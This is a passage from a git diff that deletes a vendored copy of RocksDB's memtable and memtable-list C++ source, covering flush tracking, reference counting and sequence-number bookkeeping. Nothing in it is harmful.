-  //     if sizeof(new_value) <= sizeof(prev_value)
-  //       update inplace
-  //     else add(key, new_value)
-  //   else return false
-  //
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  bool UpdateCallback(SequenceNumber seq,
-                      const Slice& key,
-                      const Slice& delta);
-
-  // Returns the number of successive merge entries starting from the newest
-  // entry for the key up to the last non-merge entry or last entry for the
-  // key in the memtable.
-  size_t CountSuccessiveMergeEntries(const LookupKey& key);
-
-  // Update counters and flush status after inserting a whole write batch
-  // Used in concurrent memtable inserts.
-  void BatchPostProcess(const MemTablePostProcessInfo& update_counters) {
-    num_entries_.fetch_add(update_counters.num_entries,
-                           std::memory_order_relaxed);
-    data_size_.fetch_add(update_counters.data_size, std::memory_order_relaxed);
-    if (update_counters.num_deletes != 0) {
-      num_deletes_.fetch_add(update_counters.num_deletes,
-                             std::memory_order_relaxed);
-    }
-    UpdateFlushState();
-  }
-
-  // Get total number of entries in the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  uint64_t num_entries() const {
-    return num_entries_.load(std::memory_order_relaxed);
-  }
-
-  // Get total number of deletes in the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  uint64_t num_deletes() const {
-    return num_deletes_.load(std::memory_order_relaxed);
-  }
-
-  // Dynamically change the memtable's capacity. If set below the current usage,
-  // the next key added will trigger a flush. Can only increase size when
-  // memtable prefix bloom is disabled, since we can't easily allocate more
-  // space.
-  void UpdateWriteBufferSize(size_t new_write_buffer_size) {
-    if (prefix_bloom_ == nullptr ||
-        new_write_buffer_size < write_buffer_size_) {
-      write_buffer_size_.store(new_write_buffer_size,
-                               std::memory_order_relaxed);
-    }
-  }
-
-  // Returns the edits area that is needed for flushing the memtable
-  VersionEdit* GetEdits() { return &edit_; }
-
-  // Returns if there is no entry inserted to the mem table.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  bool IsEmpty() const { return first_seqno_ == 0; }
-
-  // Returns the sequence number of the first element that was inserted
-  // into the memtable.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable (unless this Memtable is immutable).
-  SequenceNumber GetFirstSequenceNumber() {
-    return first_seqno_.load(std::memory_order_relaxed);
-  }
-
-  // Returns the sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into this
-  // memtable. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  //
-  // If the earliest sequence number could not be determined,
-  // kMaxSequenceNumber will be returned.
-  SequenceNumber GetEarliestSequenceNumber() {
-    return earliest_seqno_.load(std::memory_order_relaxed);
-  }
-
-  // DB's latest sequence ID when the memtable is created. This number
-  // may be updated to a more recent one before any key is inserted.
-  SequenceNumber GetCreationSeq() const { return creation_seq_; }
-
-  void SetCreationSeq(SequenceNumber sn) { creation_seq_ = sn; }
-
-  // Returns the next active logfile number when this memtable is about to
-  // be flushed to storage
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  uint64_t GetNextLogNumber() { return mem_next_logfile_number_; }
-
-  // Sets the next active logfile number when this memtable is about to
-  // be flushed to storage
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void SetNextLogNumber(uint64_t num) { mem_next_logfile_number_ = num; }
-
-  // if this memtable contains data from a committed
-  // two phase transaction we must take note of the
-  // log which contains that data so we can know
-  // when to relese that log
-  void RefLogContainingPrepSection(uint64_t log);
-  uint64_t GetMinLogContainingPrepSection();
-
-  // Notify the underlying storage that no more items will be added.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  // After MarkImmutable() is called, you should not attempt to
-  // write anything to this MemTable().  (Ie. do not call Add() or Update()).
-  void MarkImmutable() {
-    table_->MarkReadOnly();
-    mem_tracker_.DoneAllocating();
-  }
-
-  // return true if the current MemTableRep supports merge operator.
-  bool IsMergeOperatorSupported() const {
-    return table_->IsMergeOperatorSupported();
-  }
-
-  // return true if the current MemTableRep supports snapshots.
-  // inplace update prevents snapshots,
-  bool IsSnapshotSupported() const {
-    return table_->IsSnapshotSupported() && !moptions_.inplace_update_support;
-  }
-
-  struct MemTableStats {
-    uint64_t size;
-    uint64_t count;
-  };
-
-  MemTableStats ApproximateStats(const Slice& start_ikey,
-                                 const Slice& end_ikey);
-
-  // Get the lock associated for the key
-  port::RWMutex* GetLock(const Slice& key);
-
-  const InternalKeyComparator& GetInternalKeyComparator() const {
-    return comparator_.comparator;
-  }
-
-  const ImmutableMemTableOptions* GetImmutableMemTableOptions() const {
-    return &moptions_;
-  }
-
-  uint64_t ApproximateOldestKeyTime() const {
-    return oldest_key_time_.load(std::memory_order_relaxed);
-  }
-
- private:
-  enum FlushStateEnum { FLUSH_NOT_REQUESTED, FLUSH_REQUESTED, FLUSH_SCHEDULED };
-
-  friend class MemTableIterator;
-  friend class MemTableBackwardIterator;
-  friend class MemTableList;
-
-  KeyComparator comparator_;
-  const ImmutableMemTableOptions moptions_;
-  int refs_;
-  const size_t kArenaBlockSize;
-  AllocTracker mem_tracker_;
-  ConcurrentArena arena_;
-  unique_ptr<MemTableRep> table_;
-  unique_ptr<MemTableRep> range_del_table_;
-  bool is_range_del_table_empty_;
-
-  // Total data size of all data inserted
-  std::atomic<uint64_t> data_size_;
-  std::atomic<uint64_t> num_entries_;
-  std::atomic<uint64_t> num_deletes_;
-
-  // Dynamically changeable memtable option
-  std::atomic<size_t> write_buffer_size_;
-
-  // These are used to manage memtable flushes to storage
-  bool flush_in_progress_; // started the flush
-  bool flush_completed_;   // finished the flush
-  uint64_t file_number_;    // filled up after flush is complete
-
-  // The updates to be applied to the transaction log when this
-  // memtable is flushed to storage.
-  VersionEdit edit_;
-
-  // The sequence number of the kv that was inserted first
-  std::atomic<SequenceNumber> first_seqno_;
-
-  // The db sequence number at the time of creation or kMaxSequenceNumber
-  // if not set.
-  std::atomic<SequenceNumber> earliest_seqno_;
-
-  SequenceNumber creation_seq_;
-
-  // The log files earlier than this number can be deleted.
-  uint64_t mem_next_logfile_number_;
-
-  // the earliest log containing a prepared section
-  // which has been inserted into this memtable.
-  std::atomic<uint64_t> min_prep_log_referenced_;
-
-  // rw locks for inplace updates
-  std::vector<port::RWMutex> locks_;
-
-  const SliceTransform* const prefix_extractor_;
-  std::unique_ptr<DynamicBloom> prefix_bloom_;
-
-  std::atomic<FlushStateEnum> flush_state_;
-
-  Env* env_;
-
-  // Extract sequential insert prefixes.
-  const SliceTransform* insert_with_hint_prefix_extractor_;
-
-  // Insert hints for each prefix.
-  std::unordered_map<Slice, void*, SliceHasher> insert_hints_;
-
-  // Timestamp of oldest key
-  std::atomic<uint64_t> oldest_key_time_;
-
-  // Returns a heuristic flush decision
-  bool ShouldFlushNow() const;
-
-  // Updates flush_state_ using ShouldFlushNow()
-  void UpdateFlushState();
-
-  void UpdateOldestKeyTime();
-
-  // No copying allowed
-  MemTable(const MemTable&);
-  MemTable& operator=(const MemTable&);
-};
-
-extern const char* EncodeKey(std::string* scratch, const Slice& target);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list.cc b/thirdparty/rocksdb/db/memtable_list.cc
deleted file mode 100644
index 5921a50..0000000
--- a/thirdparty/rocksdb/db/memtable_list.cc
+++ /dev/null
@@ -1,486 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "db/memtable_list.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <string>
-#include "db/memtable.h"
-#include "db/version_set.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "table/merging_iterator.h"
-#include "util/coding.h"
-#include "util/log_buffer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class InternalKeyComparator;
-class Mutex;
-class VersionSet;
-
-void MemTableListVersion::AddMemTable(MemTable* m) {
-  memlist_.push_front(m);
-  *parent_memtable_list_memory_usage_ += m->ApproximateMemoryUsage();
-}
-
-void MemTableListVersion::UnrefMemTable(autovector<MemTable*>* to_delete,
-                                        MemTable* m) {
-  if (m->Unref()) {
-    to_delete->push_back(m);
-    assert(*parent_memtable_list_memory_usage_ >= m->ApproximateMemoryUsage());
-    *parent_memtable_list_memory_usage_ -= m->ApproximateMemoryUsage();
-  } else {
-  }
-}
-
-MemTableListVersion::MemTableListVersion(
-    size_t* parent_memtable_list_memory_usage, MemTableListVersion* old)
-    : max_write_buffer_number_to_maintain_(
-          old->max_write_buffer_number_to_maintain_),
-      parent_memtable_list_memory_usage_(parent_memtable_list_memory_usage) {
-  if (old != nullptr) {
-    memlist_ = old->memlist_;
-    for (auto& m : memlist_) {
-      m->Ref();
-    }
-
-    memlist_history_ = old->memlist_history_;
-    for (auto& m : memlist_history_) {
-      m->Ref();
-    }
-  }
-}
-
-MemTableListVersion::MemTableListVersion(
-    size_t* parent_memtable_list_memory_usage,
-    int max_write_buffer_number_to_maintain)
-    : max_write_buffer_number_to_maintain_(max_write_buffer_number_to_maintain),
-      parent_memtable_list_memory_usage_(parent_memtable_list_memory_usage) {}
-
-void MemTableListVersion::Ref() { ++refs_; }
-
-// called by superversion::clean()
-void MemTableListVersion::Unref(autovector<MemTable*>* to_delete) {
-  assert(refs_ >= 1);
-  --refs_;
-  if (refs_ == 0) {
-    // if to_delete is equal to nullptr it means we're confident
-    // that refs_ will not be zero
-    assert(to_delete != nullptr);
-    for (const auto& m : memlist_) {
-      UnrefMemTable(to_delete, m);
-    }
-    for (const auto& m : memlist_history_) {
-      UnrefMemTable(to_delete, m);
-    }
-    delete this;
-  }
-}
-
-int MemTableList::NumNotFlushed() const {
-  int size = static_cast<int>(current_->memlist_.size());
-  assert(num_flush_not_started_ <= size);
-  return size;
-}
-
-int MemTableList::NumFlushed() const {
-  return static_cast<int>(current_->memlist_history_.size());
-}
-
-// Search all the memtables starting from the most recent one.
-// Return the most recent value found, if any.
-// Operands stores the list of merge operations to apply, so far.
-bool MemTableListVersion::Get(const LookupKey& key, std::string* value,
-                              Status* s, MergeContext* merge_context,
-                              RangeDelAggregator* range_del_agg,
-                              SequenceNumber* seq, const ReadOptions& read_opts,
-                              bool* is_blob_index) {
-  return GetFromList(&memlist_, key, value, s, merge_context, range_del_agg,
-                     seq, read_opts, is_blob_index);
-}
-
-bool MemTableListVersion::GetFromHistory(
-    const LookupKey& key, std::string* value, Status* s,
-    MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-    SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) {
-  return GetFromList(&memlist_history_, key, value, s, merge_context,
-                     range_del_agg, seq, read_opts, is_blob_index);
-}
-
-bool MemTableListVersion::GetFromList(
-    std::list<MemTable*>* list, const LookupKey& key, std::string* value,
-    Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-    SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) {
-  *seq = kMaxSequenceNumber;
-
-  for (auto& memtable : *list) {
-    SequenceNumber current_seq = kMaxSequenceNumber;
-
-    bool done = memtable->Get(key, value, s, merge_context, range_del_agg,
-                              &current_seq, read_opts, is_blob_index);
-    if (*seq == kMaxSequenceNumber) {
-      // Store the most recent sequence number of any operation on this key.
-      // Since we only care about the most recent change, we only need to
-      // return the first operation found when searching memtables in
-      // reverse-chronological order.
-      *seq = current_seq;
-    }
-
-    if (done) {
-      assert(*seq != kMaxSequenceNumber);
-      return true;
-    }
-    if (!done && !s->ok() && !s->IsMergeInProgress() && !s->IsNotFound()) {
-      return false;
-    }
-  }
-  return false;
-}
-
-Status MemTableListVersion::AddRangeTombstoneIterators(
-    const ReadOptions& read_opts, Arena* arena,
-    RangeDelAggregator* range_del_agg) {
-  assert(range_del_agg != nullptr);
-  for (auto& m : memlist_) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        m->NewRangeTombstoneIterator(read_opts));
-    Status s = range_del_agg->AddTombstones(std::move(range_del_iter));
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-Status MemTableListVersion::AddRangeTombstoneIterators(
-    const ReadOptions& read_opts,
-    std::vector<InternalIterator*>* range_del_iters) {
-  for (auto& m : memlist_) {
-    auto* range_del_iter = m->NewRangeTombstoneIterator(read_opts);
-    if (range_del_iter != nullptr) {
-      range_del_iters->push_back(range_del_iter);
-    }
-  }
-  return Status::OK();
-}
-
-void MemTableListVersion::AddIterators(
-    const ReadOptions& options, std::vector<InternalIterator*>* iterator_list,
-    Arena* arena) {
-  for (auto& m : memlist_) {
-    iterator_list->push_back(m->NewIterator(options, arena));
-  }
-}
-
-void MemTableListVersion::AddIterators(
-    const ReadOptions& options, MergeIteratorBuilder* merge_iter_builder) {
-  for (auto& m : memlist_) {
-    merge_iter_builder->AddIterator(
-        m->NewIterator(options, merge_iter_builder->GetArena()));
-  }
-}
-
-uint64_t MemTableListVersion::GetTotalNumEntries() const {
-  uint64_t total_num = 0;
-  for (auto& m : memlist_) {
-    total_num += m->num_entries();
-  }
-  return total_num;
-}
-
-MemTable::MemTableStats MemTableListVersion::ApproximateStats(
-    const Slice& start_ikey, const Slice& end_ikey) {
-  MemTable::MemTableStats total_stats = {0, 0};
-  for (auto& m : memlist_) {
-    auto mStats = m->ApproximateStats(start_ikey, end_ikey);
-    total_stats.size += mStats.size;
-    total_stats.count += mStats.count;
-  }
-  return total_stats;
-}
-
-uint64_t MemTableListVersion::GetTotalNumDeletes() const {
-  uint64_t total_num = 0;
-  for (auto& m : memlist_) {
-    total_num += m->num_deletes();
-  }
-  return total_num;
-}
-
-SequenceNumber MemTableListVersion::GetEarliestSequenceNumber(
-    bool include_history) const {
-  if (include_history && !memlist_history_.empty()) {
-    return memlist_history_.back()->GetEarliestSequenceNumber();
-  } else if (!memlist_.empty()) {
-    return memlist_.back()->GetEarliestSequenceNumber();
-  } else {
-    return kMaxSequenceNumber;
-  }
-}
-
-// caller is responsible for referencing m
-void MemTableListVersion::Add(MemTable* m, autovector<MemTable*>* to_delete) {
-  assert(refs_ == 1);  // only when refs_ == 1 is MemTableListVersion mutable
-  AddMemTable(m);
-
-  TrimHistory(to_delete);
-}
-
-// Removes m from list of memtables not flushed.  Caller should NOT Unref m.
-void MemTableListVersion::Remove(MemTable* m,
-                                 autovector<MemTable*>* to_delete) {
-  assert(refs_ == 1);  // only when refs_ == 1 is MemTableListVersion mutable
-  memlist_.remove(m);
-
-  if (max_write_buffer_number_to_maintain_ > 0) {
-    memlist_history_.push_front(m);
-    TrimHistory(to_delete);
-  } else {
-    UnrefMemTable(to_delete, m);
-  }
-}
-
-// Make sure we don't use up too much space in history
-void MemTableListVersion::TrimHistory(autovector<MemTable*>* to_delete) {
-  while (memlist_.size() + memlist_history_.size() >
-             static_cast<size_t>(max_write_buffer_number_to_maintain_) &&
-         !memlist_history_.empty()) {
-    MemTable* x = memlist_history_.back();
-    memlist_history_.pop_back();
-
-    UnrefMemTable(to_delete, x);
-  }
-}
-
-// Returns true if there is at least one memtable on which flush has
-// not yet started.
-bool MemTableList::IsFlushPending() const {
-  if ((flush_requested_ && num_flush_not_started_ >= 1) ||
-      (num_flush_not_started_ >= min_write_buffer_number_to_merge_)) {
-    assert(imm_flush_needed.load(std::memory_order_relaxed));
-    return true;
-  }
-  return false;
-}
-
-// Returns the memtables that need to be flushed.
-void MemTableList::PickMemtablesToFlush(autovector<MemTable*>* ret) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_PICK_MEMTABLES_TO_FLUSH);
-  const auto& memlist = current_->memlist_;
-  for (auto it = memlist.rbegin(); it != memlist.rend(); ++it) {
-    MemTable* m = *it;
-    if (!m->flush_in_progress_) {
-      assert(!m->flush_completed_);
-      num_flush_not_started_--;
-      if (num_flush_not_started_ == 0) {
-        imm_flush_needed.store(false, std::memory_order_release);
-      }
-      m->flush_in_progress_ = true;  // flushing will start very soon
-      ret->push_back(m);
-    }
-  }
-  flush_requested_ = false;  // start-flush request is complete
-}
-
-void MemTableList::RollbackMemtableFlush(const autovector<MemTable*>& mems,
-                                         uint64_t file_number) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_MEMTABLE_ROLLBACK);
-  assert(!mems.empty());
-
-  // If the flush was not successful, then just reset state.
-  // Maybe a succeeding attempt to flush will be successful.
-  for (MemTable* m : mems) {
-    assert(m->flush_in_progress_);
-    assert(m->file_number_ == 0);
-
-    m->flush_in_progress_ = false;
-    m->flush_completed_ = false;
-    m->edit_.Clear();
-    num_flush_not_started_++;
-  }
-  imm_flush_needed.store(true, std::memory_order_release);
-}
-
-// Record a successful flush in the manifest file
-Status MemTableList::InstallMemtableFlushResults(
-    ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-    const autovector<MemTable*>& mems, VersionSet* vset, InstrumentedMutex* mu,
-    uint64_t file_number, autovector<MemTable*>* to_delete,
-    Directory* db_directory, LogBuffer* log_buffer) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_MEMTABLE_INSTALL_FLUSH_RESULTS);
-  mu->AssertHeld();
-
-  // flush was successful
-  for (size_t i = 0; i < mems.size(); ++i) {
-    // All the edits are associated with the first memtable of this batch.
-    assert(i == 0 || mems[i]->GetEdits()->NumEntries() == 0);
-
-    mems[i]->flush_completed_ = true;
-    mems[i]->file_number_ = file_number;
-  }
-
-  // if some other thread is already committing, then return
-  Status s;
-  if (commit_in_progress_) {
-    TEST_SYNC_POINT("MemTableList::InstallMemtableFlushResults:InProgress");
-    return s;
-  }
-
-  // Only a single thread can be executing this piece of code
-  commit_in_progress_ = true;
-
-  // Retry until all completed flushes are committed. New flushes can finish
-  // while the current thread is writing manifest where mutex is released.
-  while (s.ok()) {
-    auto& memlist = current_->memlist_;
-    if (memlist.empty() || !memlist.back()->flush_completed_) {
-      break;
-    }
-    // scan all memtables from the earliest, and commit those
-    // (in that order) that have finished flushing. Memetables
-    // are always committed in the order that they were created.
-    uint64_t batch_file_number = 0;
-    size_t batch_count = 0;
-    autovector<VersionEdit*> edit_list;
-    // enumerate from the last (earliest) element to see how many batch finished
-    for (auto it = memlist.rbegin(); it != memlist.rend(); ++it) {
-      MemTable* m = *it;
-      if (!m->flush_completed_) {
-        break;
-      }
-      if (it == memlist.rbegin() || batch_file_number != m->file_number_) {
-        batch_file_number = m->file_number_;
-        ROCKS_LOG_BUFFER(log_buffer,
-                         "[%s] Level-0 commit table #%" PRIu64 " started",
-                         cfd->GetName().c_str(), m->file_number_);
-        edit_list.push_back(&m->edit_);
-      }
-      batch_count++;
-    }
-
-    if (batch_count > 0) {
-      // this can release and reacquire the mutex.
-      s = vset->LogAndApply(cfd, mutable_cf_options, edit_list, mu,
-                            db_directory);
-
-      // we will be changing the version in the next code path,
-      // so we better create a new one, since versions are immutable
-      InstallNewVersion();
-
-      // All the later memtables that have the same filenum
-      // are part of the same batch. They can be committed now.
-      uint64_t mem_id = 1;  // how many memtables have been flushed.
-      if (s.ok()) {         // commit new state
-        while (batch_count-- > 0) {
-          MemTable* m = current_->memlist_.back();
-          ROCKS_LOG_BUFFER(log_buffer, "[%s] Level-0 commit table #%" PRIu64
-                                       ": memtable #%" PRIu64 " done",
-                           cfd->GetName().c_str(), m->file_number_, mem_id);
-          assert(m->file_number_ > 0);
-          current_->Remove(m, to_delete);
-          ++mem_id;
-        }
-      } else {
-        for (auto it = current_->memlist_.rbegin(); batch_count-- > 0; it++) {
-          MemTable* m = *it;
-          // commit failed. setup state so that we can flush again.
-          ROCKS_LOG_BUFFER(log_buffer, "Level-0 commit table #%" PRIu64
-                                       ": memtable #%" PRIu64 " failed",
-                           m->file_number_, mem_id);
-          m->flush_completed_ = false;
-          m->flush_in_progress_ = false;
-          m->edit_.Clear();
-          num_flush_not_started_++;
-          m->file_number_ = 0;
-          imm_flush_needed.store(true, std::memory_order_release);
-          ++mem_id;
-        }
-      }
-    }
-  }
-  commit_in_progress_ = false;
-  return s;
-}
-
-// New memtables are inserted at the front of the list.
-void MemTableList::Add(MemTable* m, autovector<MemTable*>* to_delete) {
-  assert(static_cast<int>(current_->memlist_.size()) >= num_flush_not_started_);
-  InstallNewVersion();
-  // this method is used to move mutable memtable into an immutable list.
-  // since mutable memtable is already refcounted by the DBImpl,
-  // and when moving to the imutable list we don't unref it,
-  // we don't have to ref the memtable here. we just take over the
-  // reference from the DBImpl.
-  current_->Add(m, to_delete);
-  m->MarkImmutable();
-  num_flush_not_started_++;
-  if (num_flush_not_started_ == 1) {
-    imm_flush_needed.store(true, std::memory_order_release);
-  }
-}
-
-// Returns an estimate of the number of bytes of data in use.
-size_t MemTableList::ApproximateUnflushedMemTablesMemoryUsage() {
-  size_t total_size = 0;
-  for (auto& memtable : current_->memlist_) {
-    total_size += memtable->ApproximateMemoryUsage();
-  }
-  return total_size;
-}
-
-size_t MemTableList::ApproximateMemoryUsage() { return current_memory_usage_; }
-
-uint64_t MemTableList::ApproximateOldestKeyTime() const {
-  if (!current_->memlist_.empty()) {
-    return current_->memlist_.back()->ApproximateOldestKeyTime();
-  }
-  return std::numeric_limits<uint64_t>::max();
-}
-
-void MemTableList::InstallNewVersion() {
-  if (current_->refs_ == 1) {
-    // we're the only one using the version, just keep using it
-  } else {
-    // somebody else holds the current version, we need to create new one
-    MemTableListVersion* version = current_;
-    current_ = new MemTableListVersion(&current_memory_usage_, current_);
-    current_->Ref();
-    version->Unref();
-  }
-}
-
-uint64_t MemTableList::GetMinLogContainingPrepSection() {
-  uint64_t min_log = 0;
-
-  for (auto& m : current_->memlist_) {
-    // this mem has been flushed it no longer
-    // needs to hold on the its prep section
-    if (m->flush_completed_) {
-      continue;
-    }
-
-    auto log = m->GetMinLogContainingPrepSection();
-
-    if (log > 0 && (min_log == 0 || log < min_log)) {
-      min_log = log;
-    }
-  }
-
-  return min_log;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable_list.h b/thirdparty/rocksdb/db/memtable_list.h
deleted file mode 100644
index 69038af..0000000
--- a/thirdparty/rocksdb/db/memtable_list.h
+++ /dev/null
@@ -1,265 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#include <string>
-#include <list>
-#include <vector>
-#include <set>
-#include <deque>
-
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "db/range_del_aggregator.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/types.h"
-#include "util/autovector.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-class InternalKeyComparator;
-class InstrumentedMutex;
-class MergeIteratorBuilder;
-
-// keeps a list of immutable memtables in a vector. the list is immutable
-// if refcount is bigger than one. It is used as a state for Get() and
-// Iterator code paths
-//
-// This class is not thread-safe.  External synchronization is required
-// (such as holding the db mutex or being on the write thread).
-class MemTableListVersion {
- public:
-  explicit MemTableListVersion(size_t* parent_memtable_list_memory_usage,
-                               MemTableListVersion* old = nullptr);
-  explicit MemTableListVersion(size_t* parent_memtable_list_memory_usage,
-                               int max_write_buffer_number_to_maintain);
-
-  void Ref();
-  void Unref(autovector<MemTable*>* to_delete = nullptr);
-
-  // Search all the memtables starting from the most recent one.
-  // Return the most recent value found, if any.
-  //
-  // If any operation was found for this key, its most recent sequence number
-  // will be stored in *seq on success (regardless of whether true/false is
-  // returned).  Otherwise, *seq will be set to kMaxSequenceNumber.
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           SequenceNumber* seq, const ReadOptions& read_opts,
-           bool* is_blob_index = nullptr);
-
-  bool Get(const LookupKey& key, std::string* value, Status* s,
-           MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-           const ReadOptions& read_opts, bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return Get(key, value, s, merge_context, range_del_agg, &seq, read_opts,
-               is_blob_index);
-  }
-
-  // Similar to Get(), but searches the Memtable history of memtables that
-  // have already been flushed.  Should only be used from in-memory only
-  // queries (such as Transaction validation) as the history may contain
-  // writes that are also present in the SST files.
-  bool GetFromHistory(const LookupKey& key, std::string* value, Status* s,
-                      MergeContext* merge_context,
-                      RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                      const ReadOptions& read_opts,
-                      bool* is_blob_index = nullptr);
-  bool GetFromHistory(const LookupKey& key, std::string* value, Status* s,
-                      MergeContext* merge_context,
-                      RangeDelAggregator* range_del_agg,
-                      const ReadOptions& read_opts,
-                      bool* is_blob_index = nullptr) {
-    SequenceNumber seq;
-    return GetFromHistory(key, value, s, merge_context, range_del_agg, &seq,
-                          read_opts, is_blob_index);
-  }
-
-  Status AddRangeTombstoneIterators(const ReadOptions& read_opts, Arena* arena,
-                                    RangeDelAggregator* range_del_agg);
-  Status AddRangeTombstoneIterators(
-      const ReadOptions& read_opts,
-      std::vector<InternalIterator*>* range_del_iters);
-
-  void AddIterators(const ReadOptions& options,
-                    std::vector<InternalIterator*>* iterator_list,
-                    Arena* arena);
-
-  void AddIterators(const ReadOptions& options,
-                    MergeIteratorBuilder* merge_iter_builder);
-
-  uint64_t GetTotalNumEntries() const;
-
-  uint64_t GetTotalNumDeletes() const;
-
-  MemTable::MemTableStats ApproximateStats(const Slice& start_ikey,
-                                           const Slice& end_ikey);
-
-  // Returns the value of MemTable::GetEarliestSequenceNumber() on the most
-  // recent MemTable in this list or kMaxSequenceNumber if the list is empty.
-  // If include_history=true, will also search Memtables in MemTableList
-  // History.
-  SequenceNumber GetEarliestSequenceNumber(bool include_history = false) const;
-
- private:
-  // REQUIRE: m is an immutable memtable
-  void Add(MemTable* m, autovector<MemTable*>* to_delete);
-  // REQUIRE: m is an immutable memtable
-  void Remove(MemTable* m, autovector<MemTable*>* to_delete);
-
-  void TrimHistory(autovector<MemTable*>* to_delete);
-
-  bool GetFromList(std::list<MemTable*>* list, const LookupKey& key,
-                   std::string* value, Status* s, MergeContext* merge_context,
-                   RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                   const ReadOptions& read_opts, bool* is_blob_index = nullptr);
-
-  void AddMemTable(MemTable* m);
-
-  void UnrefMemTable(autovector<MemTable*>* to_delete, MemTable* m);
-
-  friend class MemTableList;
-
-  // Immutable MemTables that have not yet been flushed.
-  std::list<MemTable*> memlist_;
-
-  // MemTables that have already been flushed
-  // (used during Transaction validation)
-  std::list<MemTable*> memlist_history_;
-
-  // Maximum number of MemTables to keep in memory (including both flushed
-  // and not-yet-flushed tables).
-  const int max_write_buffer_number_to_maintain_;
-
-  int refs_ = 0;
-
-  size_t* parent_memtable_list_memory_usage_;
-};
-
-// This class stores references to all the immutable memtables.
-// The memtables are flushed to L0 as soon as possible and in
-// any order. If there are more than one immutable memtable, their
-// flushes can occur concurrently.  However, they are 'committed'
-// to the manifest in FIFO order to maintain correctness and
-// recoverability from a crash.
-//
-//
-// Other than imm_flush_needed, this class is not thread-safe and requires
-// external synchronization (such as holding the db mutex or being on the
-// write thread.)
-class MemTableList {
- public:
-  // A list of memtables.
-  explicit MemTableList(int min_write_buffer_number_to_merge,
-                        int max_write_buffer_number_to_maintain)
-      : imm_flush_needed(false),
-        min_write_buffer_number_to_merge_(min_write_buffer_number_to_merge),
-        current_(new MemTableListVersion(&current_memory_usage_,
-                                         max_write_buffer_number_to_maintain)),
-        num_flush_not_started_(0),
-        commit_in_progress_(false),
-        flush_requested_(false) {
-    current_->Ref();
-    current_memory_usage_ = 0;
-  }
-
-  // Should not delete MemTableList without making sure MemTableList::current()
-  // is Unref()'d.
-  ~MemTableList() {}
-
-  MemTableListVersion* current() { return current_; }
-
-  // so that background threads can detect non-nullptr pointer to
-  // determine whether there is anything more to start flushing.
-  std::atomic<bool> imm_flush_needed;
-
-  // Returns the total number of memtables in the list that haven't yet
-  // been flushed and logged.
-  int NumNotFlushed() const;
-
-  // Returns total number of memtables in the list that have been
-  // completely flushed and logged.
-  int NumFlushed() const;
-
-  // Returns true if there is at least one memtable on which flush has
-  // not yet started.
-  bool IsFlushPending() const;
-
-  // Returns the earliest memtables that needs to be flushed. The returned
-  // memtables are guaranteed to be in the ascending order of created time.
-  void PickMemtablesToFlush(autovector<MemTable*>* mems);
-
-  // Reset status of the given memtable list back to pending state so that
-  // they can get picked up again on the next round of flush.
-  void RollbackMemtableFlush(const autovector<MemTable*>& mems,
-                             uint64_t file_number);
-
-  // Commit a successful flush in the manifest file
-  Status InstallMemtableFlushResults(
-      ColumnFamilyData* cfd, const MutableCFOptions& mutable_cf_options,
-      const autovector<MemTable*>& m, VersionSet* vset, InstrumentedMutex* mu,
-      uint64_t file_number, autovector<MemTable*>* to_delete,
-      Directory* db_directory, LogBuffer* log_buffer);
-
-  // New memtables are inserted at the front of the list.
-  // Takes ownership of the referenced held on *m by the caller of Add().
-  void Add(MemTable* m, autovector<MemTable*>* to_delete);
-
-  // Returns an estimate of the number of bytes of data in use.
-  size_t ApproximateMemoryUsage();
-
-  // Returns an estimate of the number of bytes of data used by
-  // the unflushed mem-tables.
